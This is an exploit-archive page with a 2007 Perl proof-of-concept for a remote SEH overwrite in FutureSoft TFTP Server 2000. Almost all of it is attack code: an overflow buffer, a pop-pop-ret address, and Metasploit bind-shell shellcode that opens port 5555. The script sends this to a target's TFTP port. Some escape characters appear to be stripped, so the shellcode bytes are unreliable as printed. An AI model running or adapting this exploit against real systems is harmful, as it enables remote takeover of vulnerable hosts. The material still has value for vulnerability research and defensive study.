Home / exploits futuresoft-seh.txt
Posted on 24 March 2007
#!/usr/bin/perl # =============================================================================================== # FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit # By Umesh Wanve # =============================================================================================== # # Date : 22-03-2007 # # Tested on Windows 2000 SP4 Server English # Windows 2000 SP4 Professional English # # You can replace shellcode with your favourite one :) # # # Stack ---> buffer === AAAAA......... # | # Pointer to next SEH === Short Jump to Hellcode # | # SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4) # | # NOP Sled === Nop Sled # | # Hellcode === Hell......... # # This exploit will open port 5555 on remote server. Connect it to open shell. # # # P.S: This was written for educational purpose. Use it at your own risk.Author will be not be # responsible for any damage. # # Always Thanks to Metasploit. # #================================================================================================== use IO::Socket; #use strict; my($read_request)="x00x01"; # GET or PUT request my($tailer)="x00x6ex65x74x61x73x63x69x69x00"; #transporting mode (eg. netascii) # win32_bind - EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com my($shellcode)= "x90x90x90x90". #padding "x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex60". "x5fx45x77x83xeexfcxe2xf4x9cx35xaex3ax88xa6xbax88". "x9fx3fxcex1bx44x7bxcex32x5cxd4x39x72x18x5exaaxfc". "x2fx47xcex28x40x5exaex3exebx6bxcex76x8ex6ex85xee". "xccxdbx85x03x67x9ex8fx7ax61x9dxaex83x5bx0bx61x5f". "x15xbaxcex28x44x5exaex11xebx53x0exfcx3fx43x44x9c". "x63x73xcexfex0cx7bx59x16xa3x6ex9ex13xebx1cx75xfc". "x20x53xcex07x7cxf2xcex37x68x01x2dxf9x2ex51xa9x27". "x9fx89x23x24x06x37x76x45x08x28x36x45x3fx0bxbaxa7". "x08x94xa8x8bx5bx0fxbaxa1x3fxd6xa0x11xe1xb2x4dx75". "x35x35x47x88xb0x37x9cx7ex95xf2x12x88xb6x0cx16x24". "x33x0cx06x24x23x0cxbaxa7x06x37x50xc4x06x0cxccx96". "xf5x37xe1x6dx10x98x12x88xb6x35x55x26x35xa0x95x1f". "xc4xf2x6bx9ex37xa0x93x24x35xa0x95x1fx85x16xc3x3e". "x37xa0x93x27x34x0bx10x88xb0xccx2dx90x19x99x3cx20". "x9fx89x10x88xb0x39x2fx13x06x37x26x1axe9xbax2fx27". "x39x76x89xfex87x35x01xfex82x6ex85x84xcaxa1x07x5a". "x9ex1dx69xe4xedx25x7dxdcxcbxf4x2dx05x9execx53x88". "x15x1bxbaxa1x3bx08x17x26x31x0ex2fx76x31x0ex10x26". "x9fx8fx2dxdaxb9x5ax8bx24x9fx89x2fx88x9fx68xbaxa7". "xebx08xb9xf4xa4x3bxbaxa1x32xa0x95x1fx90xd5x41x28". "x33xa0x93x88xb0x5fx45x77". "x90x90x90x90". #padding "x90x90x90x90"; my($pointer_to_next_seh)="xebx06x90x90"; #short jump to shellcode my($seh_handler)="xa9x11x02x75"; #pop, pop, ret #(ws2help.dll win2000 sp4) #Building malicious buffer my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode.$tailer; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "69", Proto => "UDP")) { print "++Building Packet...... " ; print "++Connecting to server..... "; print "++Sending Buffer .... "; print "++Exploit Successfull... "; print "++Connect to victim on 5555..... "; # request + file name + mode #see tftp protocol print $socket $buffer; sleep(1); close($socket); } else { print "Cannot connect to $ARGV[0]:69 "; } # __END_CODE